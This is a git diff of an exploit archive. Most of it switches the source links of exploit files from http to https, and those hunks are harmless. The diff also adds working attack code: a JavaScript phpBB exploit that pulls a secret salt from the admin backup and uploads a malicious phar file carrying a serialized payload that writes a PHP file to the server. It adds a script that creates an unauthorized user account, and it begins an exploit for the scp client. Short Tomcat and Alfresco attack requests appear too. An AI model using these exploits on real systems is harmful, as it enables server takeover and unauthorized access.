Gadu-Gadu Instant Messenger is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35805.txt b/exploits/multiple/remote/35805.txt index 6de1cee62..72c25e3e0 100644 --- a/exploits/multiple/remote/35805.txt +++ b/exploits/multiple/remote/35805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48030/info +source: https://www.securityfocus.com/bid/48030/info Gadu-Gadu is prone to a remote code-execution vulnerability. diff --git a/exploits/multiple/remote/35818.txt b/exploits/multiple/remote/35818.txt index fa644ff53..e17ff6b36 100644 --- a/exploits/multiple/remote/35818.txt +++ b/exploits/multiple/remote/35818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48087/info +source: https://www.securityfocus.com/bid/48087/info Nagios is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35892.txt b/exploits/multiple/remote/35892.txt index e77b04472..2bffc96d9 100644 --- a/exploits/multiple/remote/35892.txt +++ b/exploits/multiple/remote/35892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48466/info +source: https://www.securityfocus.com/bid/48466/info MySQLDriverCS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/multiple/remote/35898.php b/exploits/multiple/remote/35898.php index 86cb094db..aecfda6ca 100644 --- a/exploits/multiple/remote/35898.php +++ b/exploits/multiple/remote/35898.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48484/info +source: https://www.securityfocus.com/bid/48484/info Atlassian JIRA is prone to a security bypass vulnerability. diff --git a/exploits/multiple/remote/35918.c b/exploits/multiple/remote/35918.c index 9384cf259..d05eeafde 100644 --- a/exploits/multiple/remote/35918.c +++ b/exploits/multiple/remote/35918.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48514/info +// source: https://www.securityfocus.com/bid/48514/info IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code. diff --git a/exploits/multiple/remote/36004.txt b/exploits/multiple/remote/36004.txt index b2f94f84c..aaea86020 100644 --- a/exploits/multiple/remote/36004.txt +++ b/exploits/multiple/remote/36004.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48951/info +source: https://www.securityfocus.com/bid/48951/info Skype is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/36006.java b/exploits/multiple/remote/36006.java index f48f24711..945e0b7de 100644 --- a/exploits/multiple/remote/36006.java +++ b/exploits/multiple/remote/36006.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48954/info +source: https://www.securityfocus.com/bid/48954/info Open Handset Alliance Android is prone to a vulnerability that may allow a bypass of the browser sandbox. diff --git a/exploits/multiple/remote/36013.txt b/exploits/multiple/remote/36013.txt index 4f6d3ecd9..d55af5b43 100644 --- a/exploits/multiple/remote/36013.txt +++ b/exploits/multiple/remote/36013.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/48982/info +source: https://www.securityfocus.com/bid/48982/info foomatic-gui is prone to a remote arbitrary shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/36016.txt b/exploits/multiple/remote/36016.txt index 4447bfa5e..51b4e4955 100644 --- a/exploits/multiple/remote/36016.txt +++ b/exploits/multiple/remote/36016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49007/info +source: https://www.securityfocus.com/bid/49007/info Xpdf is prone to a security-bypass vulnerability that may allow attackers to perform actions without proper authorization. diff --git a/exploits/multiple/remote/36130.txt b/exploits/multiple/remote/36130.txt index 478846c9b..76bc113b9 100644 --- a/exploits/multiple/remote/36130.txt +++ b/exploits/multiple/remote/36130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/49535/info +source: https://www.securityfocus.com/bid/49535/info Spring Security is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input. diff --git a/exploits/multiple/remote/36238.txt b/exploits/multiple/remote/36238.txt index f2be68954..86d8afe2e 100644 --- a/exploits/multiple/remote/36238.txt +++ b/exploits/multiple/remote/36238.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50168/info +source: https://www.securityfocus.com/bid/50168/info Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/36246.txt b/exploits/multiple/remote/36246.txt index 3514df4e3..5bcbc0033 100644 --- a/exploits/multiple/remote/36246.txt +++ b/exploits/multiple/remote/36246.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50296/info +source: https://www.securityfocus.com/bid/50296/info Splunk is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/36426.txt b/exploits/multiple/remote/36426.txt index adb277590..2789b50e0 100644 --- a/exploits/multiple/remote/36426.txt +++ b/exploits/multiple/remote/36426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50940/info +source: https://www.securityfocus.com/bid/50940/info Apache Struts is prone to a security-bypass vulnerability that allows session tampering. diff --git a/exploits/multiple/remote/36537.txt b/exploits/multiple/remote/36537.txt index 121a87308..6c6149b7f 100644 --- a/exploits/multiple/remote/36537.txt +++ b/exploits/multiple/remote/36537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51337/info +source: https://www.securityfocus.com/bid/51337/info SonicWall AntiSpam & EMail is prone to a cross-site scripting vulnerability, a URI-redirection vulnerability, and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/36681.txt b/exploits/multiple/remote/36681.txt index b95bf69b7..ec2c3e7de 100644 --- a/exploits/multiple/remote/36681.txt +++ b/exploits/multiple/remote/36681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51939/info +source: https://www.securityfocus.com/bid/51939/info Apache MyFaces is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/37081.py b/exploits/multiple/remote/37081.py index e56fe8b67..c29d567b8 100755 --- a/exploits/multiple/remote/37081.py +++ b/exploits/multiple/remote/37081.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53015/info +source: https://www.securityfocus.com/bid/53015/info McAfee Web Gateway is prone to a security-bypass vulnerability because it fails to properly enforce filtering rules. diff --git a/exploits/multiple/remote/37647.txt b/exploits/multiple/remote/37647.txt index 02c5359d6..edb6fa8df 100644 --- a/exploits/multiple/remote/37647.txt +++ b/exploits/multiple/remote/37647.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55165/info +source: https://www.securityfocus.com/bid/55165/info Apache Struts2 is prone to a remote-code-execution vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/37671.txt b/exploits/multiple/remote/37671.txt index 3b07e6b58..7a4c513a0 100644 --- a/exploits/multiple/remote/37671.txt +++ b/exploits/multiple/remote/37671.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55194/info +source: https://www.securityfocus.com/bid/55194/info Websense Content Gateway is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/37900.txt b/exploits/multiple/remote/37900.txt index bbad9a07f..846cf045b 100644 --- a/exploits/multiple/remote/37900.txt +++ b/exploits/multiple/remote/37900.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55740/info +source: https://www.securityfocus.com/bid/55740/info IBM Lotus Notes Traveler is prone to a URI-redirection vulnerability, multiple HTML-injection vulnerabilities and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/37947.txt b/exploits/multiple/remote/37947.txt index 83ce210ef..e7f1da73c 100644 --- a/exploits/multiple/remote/37947.txt +++ b/exploits/multiple/remote/37947.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55946/info +source: https://www.securityfocus.com/bid/55946/info LiteSpeed Web Server is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/multiple/remote/38049.txt b/exploits/multiple/remote/38049.txt index 2917db8ec..893deb5ca 100644 --- a/exploits/multiple/remote/38049.txt +++ b/exploits/multiple/remote/38049.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56662/info +source: https://www.securityfocus.com/bid/56662/info Greenstone is prone to the following security vulnerabilities: diff --git a/exploits/multiple/remote/38179.txt b/exploits/multiple/remote/38179.txt index 8749caf3e..475f3610b 100644 --- a/exploits/multiple/remote/38179.txt +++ b/exploits/multiple/remote/38179.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57212/info +source: https://www.securityfocus.com/bid/57212/info Dell OpenManage Server Administrator is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38230.txt b/exploits/multiple/remote/38230.txt index 0a873003d..75635ee55 100644 --- a/exploits/multiple/remote/38230.txt +++ b/exploits/multiple/remote/38230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57463/info +source: https://www.securityfocus.com/bid/57463/info Apache OFBiz is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38248.txt b/exploits/multiple/remote/38248.txt index 75d036015..6b2f9a30b 100644 --- a/exploits/multiple/remote/38248.txt +++ b/exploits/multiple/remote/38248.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57579/info +source: https://www.securityfocus.com/bid/57579/info Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38250.html b/exploits/multiple/remote/38250.html index 5de6bb609..64d51b643 100644 --- a/exploits/multiple/remote/38250.html +++ b/exploits/multiple/remote/38250.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57657/info +source: https://www.securityfocus.com/bid/57657/info Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities. diff --git a/exploits/multiple/remote/38313.html b/exploits/multiple/remote/38313.html index 05a4fcbf8..10252daee 100644 --- a/exploits/multiple/remote/38313.html +++ b/exploits/multiple/remote/38313.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57949/info +source: https://www.securityfocus.com/bid/57949/info The Dell SonicWALL Scrutinizer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38368.txt b/exploits/multiple/remote/38368.txt index 5bbf3b325..789038eb8 100644 --- a/exploits/multiple/remote/38368.txt +++ b/exploits/multiple/remote/38368.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58401/info +source: https://www.securityfocus.com/bid/58401/info McAfee Vulnerability Manager is prone to a cross-site scripting vulnerability. diff --git a/exploits/multiple/remote/38387.txt b/exploits/multiple/remote/38387.txt index f06719010..e955c87d6 100644 --- a/exploits/multiple/remote/38387.txt +++ b/exploits/multiple/remote/38387.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58450/info +source: https://www.securityfocus.com/bid/58450/info fastreader is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/38412.txt b/exploits/multiple/remote/38412.txt index 0b84257a9..5c19c8c96 100644 --- a/exploits/multiple/remote/38412.txt +++ b/exploits/multiple/remote/38412.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58715/info +source: https://www.securityfocus.com/bid/58715/info IBM Lotus Domino is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38521.c b/exploits/multiple/remote/38521.c index 363067c4f..02acc8b8d 100644 --- a/exploits/multiple/remote/38521.c +++ b/exploits/multiple/remote/38521.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/60004/info +source: https://www.securityfocus.com/bid/60004/info The RRDtool module for Python is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38549.txt b/exploits/multiple/remote/38549.txt index ab4a8ce12..02f0c09ed 100644 --- a/exploits/multiple/remote/38549.txt +++ b/exploits/multiple/remote/38549.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60345/info +source: https://www.securityfocus.com/bid/60345/info Apache Struts is prone to a remote OGNL expression injection vulnerability. diff --git a/exploits/multiple/remote/38587.txt b/exploits/multiple/remote/38587.txt index 0e6ebb6bc..213527ee3 100644 --- a/exploits/multiple/remote/38587.txt +++ b/exploits/multiple/remote/38587.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60569/info +source: https://www.securityfocus.com/bid/60569/info The Mandril Security plugin for Monkey HTTP Daemon is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/38597.txt b/exploits/multiple/remote/38597.txt index 837b3f8aa..d6f6a7a4e 100644 --- a/exploits/multiple/remote/38597.txt +++ b/exploits/multiple/remote/38597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60818/info +source: https://www.securityfocus.com/bid/60818/info Motion is prone to multiple security vulnerabilities including multiple buffer-overflow vulnerabilities, a cross-site scripting vulnerability and a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/remote/38633.pl b/exploits/multiple/remote/38633.pl index ca900ae36..0eb71b9a2 100755 --- a/exploits/multiple/remote/38633.pl +++ b/exploits/multiple/remote/38633.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61076/info +source: https://www.securityfocus.com/bid/61076/info Intelligent Platform Management Interface is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38636.txt b/exploits/multiple/remote/38636.txt index ab494178b..dad574a15 100644 --- a/exploits/multiple/remote/38636.txt +++ b/exploits/multiple/remote/38636.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61090/info +source: https://www.securityfocus.com/bid/61090/info Cryptocat is prone to an information disclosure vulnerability. diff --git a/exploits/multiple/remote/38637.txt b/exploits/multiple/remote/38637.txt index f76f6339b..916458fff 100644 --- a/exploits/multiple/remote/38637.txt +++ b/exploits/multiple/remote/38637.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61093/info +source: https://www.securityfocus.com/bid/61093/info Cryptocat is prone to an arbitrary script-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38666.txt b/exploits/multiple/remote/38666.txt index e72f99c58..ebedccfa7 100644 --- a/exploits/multiple/remote/38666.txt +++ b/exploits/multiple/remote/38666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61196/info +source: https://www.securityfocus.com/bid/61196/info Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38669.txt b/exploits/multiple/remote/38669.txt index 24ef9b838..8d3ff441c 100644 --- a/exploits/multiple/remote/38669.txt +++ b/exploits/multiple/remote/38669.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61309/info +source: https://www.securityfocus.com/bid/61309/info MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/38766.java b/exploits/multiple/remote/38766.java index 05e43c2a5..203a37f71 100644 --- a/exploits/multiple/remote/38766.java +++ b/exploits/multiple/remote/38766.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/62480/info +source: https://www.securityfocus.com/bid/62480/info Mozilla Firefox is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/38802.txt b/exploits/multiple/remote/38802.txt index d9c9fd64c..bc6f37e47 100644 --- a/exploits/multiple/remote/38802.txt +++ b/exploits/multiple/remote/38802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63052/info +source: https://www.securityfocus.com/bid/63052/info Oracle JavaServer Faces is prone to multiple directory-traversal vulnerabilities. diff --git a/exploits/multiple/remote/38805.txt b/exploits/multiple/remote/38805.txt index 5be64db06..7a3109090 100644 --- a/exploits/multiple/remote/38805.txt +++ b/exploits/multiple/remote/38805.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63193/info +source: https://www.securityfocus.com/bid/63193/info SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38812.txt b/exploits/multiple/remote/38812.txt index 37cb82a32..e2bf21cb2 100644 --- a/exploits/multiple/remote/38812.txt +++ b/exploits/multiple/remote/38812.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63259/info +source: https://www.securityfocus.com/bid/63259/info DELL Quest One Password Manager is prone to a security bypass vulnerability. diff --git a/exploits/multiple/remote/38813.txt b/exploits/multiple/remote/38813.txt index fb832f796..1192658df 100644 --- a/exploits/multiple/remote/38813.txt +++ b/exploits/multiple/remote/38813.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63260/info +source: https://www.securityfocus.com/bid/63260/info Apache Shindig is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38818.xml b/exploits/multiple/remote/38818.xml index 6ab4f1d06..ee2216638 100644 --- a/exploits/multiple/remote/38818.xml +++ b/exploits/multiple/remote/38818.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63431/info +source: https://www.securityfocus.com/bid/63431/info Openbravo ERP is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/38825.xml b/exploits/multiple/remote/38825.xml index 18b626966..6c2384fe2 100644 --- a/exploits/multiple/remote/38825.xml +++ b/exploits/multiple/remote/38825.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63719/info +source: https://www.securityfocus.com/bid/63719/info IBM Cognos Business Intelligence is prone to an information-disclosure vulnerability due to an error when parsing XML external entities. diff --git a/exploits/multiple/remote/38845.txt b/exploits/multiple/remote/38845.txt index 1cecaf2e8..45521a08c 100644 --- a/exploits/multiple/remote/38845.txt +++ b/exploits/multiple/remote/38845.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63805/info +source: https://www.securityfocus.com/bid/63805/info SKIDATA Freemotion.Gate is prone to multiple remote command-execution vulnerabilities. diff --git a/exploits/multiple/remote/38846.txt b/exploits/multiple/remote/38846.txt index 88cab5492..b9630d3d7 100644 --- a/exploits/multiple/remote/38846.txt +++ b/exploits/multiple/remote/38846.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63814/info +source: https://www.securityfocus.com/bid/63814/info nginx is prone to a remote security-bypass vulnerability. diff --git a/exploits/multiple/remote/39018.txt b/exploits/multiple/remote/39018.txt index 1367806a7..958c1d8c3 100644 --- a/exploits/multiple/remote/39018.txt +++ b/exploits/multiple/remote/39018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64836/info +source: https://www.securityfocus.com/bid/64836/info Oracle Supply Chain Products Suite is prone to a remote vulnerability in Oracle Demantra Demand Management. diff --git a/exploits/multiple/remote/39104.py b/exploits/multiple/remote/39104.py index 7a6e49ddc..0cb8e3494 100755 --- a/exploits/multiple/remote/39104.py +++ b/exploits/multiple/remote/39104.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/65675/info +source: https://www.securityfocus.com/bid/65675/info Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input. diff --git a/exploits/multiple/remote/39115.py b/exploits/multiple/remote/39115.py index 4b9805882..23a97a11d 100755 --- a/exploits/multiple/remote/39115.py +++ b/exploits/multiple/remote/39115.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/66149/info +source: https://www.securityfocus.com/bid/66149/info ET - Chat is prone to a security bypass vulnerability. diff --git a/exploits/multiple/remote/39175.py b/exploits/multiple/remote/39175.py index 88106f769..03ea92178 100755 --- a/exploits/multiple/remote/39175.py +++ b/exploits/multiple/remote/39175.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67271/info +source: https://www.securityfocus.com/bid/67271/info AssistMyTeam Team Helpdesk is prone to multiple information-disclosure vulnerabilities. diff --git a/exploits/multiple/remote/39186.pl b/exploits/multiple/remote/39186.pl index ad3819b38..e1c871146 100755 --- a/exploits/multiple/remote/39186.pl +++ b/exploits/multiple/remote/39186.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67438/info +source: https://www.securityfocus.com/bid/67438/info UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability. diff --git a/exploits/multiple/remote/39205.txt b/exploits/multiple/remote/39205.txt index 12acf1385..4f10b4037 100644 --- a/exploits/multiple/remote/39205.txt +++ b/exploits/multiple/remote/39205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67676/info +source: https://www.securityfocus.com/bid/67676/info Castor Library is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/39222.txt b/exploits/multiple/remote/39222.txt index 56b88168e..b94855cdc 100644 --- a/exploits/multiple/remote/39222.txt +++ b/exploits/multiple/remote/39222.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68117/info +source: https://www.securityfocus.com/bid/68117/info Foreman is prone to a remote command-injection vulnerability. diff --git a/exploits/multiple/remote/39258.txt b/exploits/multiple/remote/39258.txt index 6ae4e3e42..0ca0c4c3f 100644 --- a/exploits/multiple/remote/39258.txt +++ b/exploits/multiple/remote/39258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68/info +source: https://www.securityfocus.com/bid/68/info http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info diff --git a/exploits/multiple/remote/39259.txt b/exploits/multiple/remote/39259.txt index ce7396bce..9484605bb 100644 --- a/exploits/multiple/remote/39259.txt +++ b/exploits/multiple/remote/39259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68/info +source: https://www.securityfocus.com/bid/68/info http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info diff --git a/exploits/multiple/remote/39292.pl b/exploits/multiple/remote/39292.pl index d7f2fe00b..307678013 100755 --- a/exploits/multiple/remote/39292.pl +++ b/exploits/multiple/remote/39292.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69390/info +source: https://www.securityfocus.com/bid/69390/info Grand MA 300 is prone to multiple security weaknesses. diff --git a/exploits/multiple/remote/39293.pl b/exploits/multiple/remote/39293.pl index 757acae6e..f1d1bd54c 100755 --- a/exploits/multiple/remote/39293.pl +++ b/exploits/multiple/remote/39293.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69390/info +source: https://www.securityfocus.com/bid/69390/info Grand MA 300 is prone to multiple security weaknesses. diff --git a/exploits/multiple/remote/39295.js b/exploits/multiple/remote/39295.js index 9ebad1369..c03958f34 100644 --- a/exploits/multiple/remote/39295.js +++ b/exploits/multiple/remote/39295.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69525/info +source: https://www.securityfocus.com/bid/69525/info Mozilla Firefox and Thunderbird are prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/39318.txt b/exploits/multiple/remote/39318.txt index c4a3cf37d..065102e59 100644 --- a/exploits/multiple/remote/39318.txt +++ b/exploits/multiple/remote/39318.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/69849/info +source: https://www.securityfocus.com/bid/69849/info Laravel is prone to a security weakness due to pseudo password hash collision. diff --git a/exploits/multiple/remote/41783.txt b/exploits/multiple/remote/41783.txt index a1277fb22..5bd40627a 100644 --- a/exploits/multiple/remote/41783.txt +++ b/exploits/multiple/remote/41783.txt @@ -7,7 +7,7 @@ # Contact: transform2secure@gmail.com -Source: http://www.securityfocus.com/bid/94461/info +Source: https://www.securityfocus.com/bid/94461/info 1) Description: Apache Tomcat is prone to a security-bypass vulnerability. @@ -22,7 +22,7 @@ into the HTTP response. By manipulating the HTTP response the attacker could poison a web-cache, perform an XSS attack and/or obtain sensitive information from requests other then their own. -http://www.securityfocus.com/bid/94461/discuss +https://www.securityfocus.com/bid/94461/discuss 2) Exploit: GET /?{{%25}}cake\=1 HTTP/1.1 diff --git a/exploits/multiple/remote/46513.java b/exploits/multiple/remote/46513.java new file mode 100644 index 000000000..97cb07a99 --- /dev/null +++ b/exploits/multiple/remote/46513.java @@ -0,0 +1,64 @@ +// All greets goes to RIPS Tech +// Run this JS on Attachment Settings ACP page +var plupload_salt = ''; +var form_token = ''; +var creation_time = ''; +var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip +// your payload here +var payload = '\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"\x10\x5c\x04\x00\x00\x00\x0c~\x7f\xd8\xb6\x01'+'\x00'.repeat(6)+'test\xa0\x17\xd2\xe0R\xcf \xf6T\x1d\x01X\x91(\x9dD]X\x0b>\x02\x00\x00\x00GBMB'; +var byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);}); +var sid = (new URL(document.location.href)).searchParams.get('sid'); +var url = '/adm/index.php'; +var getparams = { + 'i': 'acp_database', + 'sid': sid, + 'mode': 'backup' +}; +$.get(url, getparams, function(data) { + form_token = $(data).find('[name="form_token"]').val(); + creation_time = $(data).find('[name="creation_time"]').val(); + if(form_token && creation_time) { + var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download'; + var postdata = { + 'type': 'data', + 'method': 'text', + 'where': 'download', + 'table[]': 'phpbb_config', + 'submit': 'Submit', + 'creation_time': creation_time, + 'form_token': form_token + } + $.post(posturl.replace("|", sid), postdata, function (data) { + plupload_salt = data.match(/plupload_salt',\s*'(\w{32})/)[1]; + if (plupload_salt) { + filepath = filepath.replace("$salt", plupload_salt); + var postdata = new FormData(); + postdata.append('name', 'evil.zip'); + postdata.append('chunk', 0); + postdata.append('chunks', 2); + postdata.append('add_file', 'Add the file'); + postdata.append('real_filename', 'evil.zip'); + // file + var pharfile = new File([byteArray], 'evil.zip'); + postdata.append('fileupload', pharfile); + jQuery.ajax({ + url: '/posting.php?mode=reply&f=2&t=1', + data: postdata, + cache: false, + contentType: false, + processData: false, + method: 'POST', + success: function(data){ + if ("id" in data) { + $('#img_imagick').val(filepath).focus(); + $('html, body').animate({ + scrollTop: ($('#submit').offset().top) + }, 500); + } + } + }); + + } + }, 'text'); + } +}); \ No newline at end of file diff --git a/exploits/multiple/remote/46514.js b/exploits/multiple/remote/46514.js new file mode 100644 index 000000000..1c246f1f2 --- /dev/null +++ b/exploits/multiple/remote/46514.js @@ -0,0 +1,45 @@ +var login = 'testuser'; //логин пользователя +var password = 'SuperMEgaPa$$'; //пароль +var email = 'testusername654@mailinater.com'; // email +/* Code */ +var b = BS.LoginForm; +var public_key = $F("publicKey"); +var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey")); +var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass; +var c = OO.extend(BS.ErrorsAwareListener, { + onDuplicateAccountError: function(b) { + alert(b.firstChild.nodeValue); + }, + onMaxNumberOfUserAccountsReachedError: function(b) { + alert(b.firstChild.nodeValue); + }, + onCreateUserError: function(b) { + alert(b.firstChild.nodeValue); + }, + onCompleteSave: function(c, d, b) { + BS.ErrorsAwareListener.onCompleteSave(c, d, b); + if (!b) { + BS.XMLResponse.processRedirect(d); + } + } + }); +BS.ajaxRequest("registerUserSubmit.html", { + method: "post", + parameters: parameters, + onComplete: function(i) { + if (!i.responseXML) { + alert(i.responseText); + } else { + var h = i.responseXML; + var e = BS.XMLResponse.processErrors(h, c); + console.log(i.responseText); + c.onCompleteSave(b, h, e, i.responseText); + } + }, + onFailure: function(i) { + console.log(i); + }, + onException: function(i, h) { + console.log(i); + } + }); \ No newline at end of file diff --git a/exploits/multiple/remote/46516.py b/exploits/multiple/remote/46516.py new file mode 100755 index 000000000..d871c0d9b --- /dev/null +++ b/exploits/multiple/remote/46516.py @@ -0,0 +1,151 @@ +''' +Title: SSHtranger Things +Author: Mark E. Haase +Homepage: https://www.hyperiongray.com +Date: 2019-01-17 +CVE: CVE-2019-6111, CVE-2019-6110 +Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt +Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 + +We have nicknamed this "SSHtranger Things" because the bug is so old it could be +exploited by an 8-bit Demogorgon. Tested on Python 3.6.7 and requires `paramiko` +package. + +The server listens on port 2222. It accepts any username and password, and it +generates a new host key every time you run it. + + $ python3 sshtranger_things.py + +Download a file using a vulnerable client. The local path must be a dot: + + $ scp -P 2222 foo@localhost:test.txt . + The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established. + RSA key fingerprint is 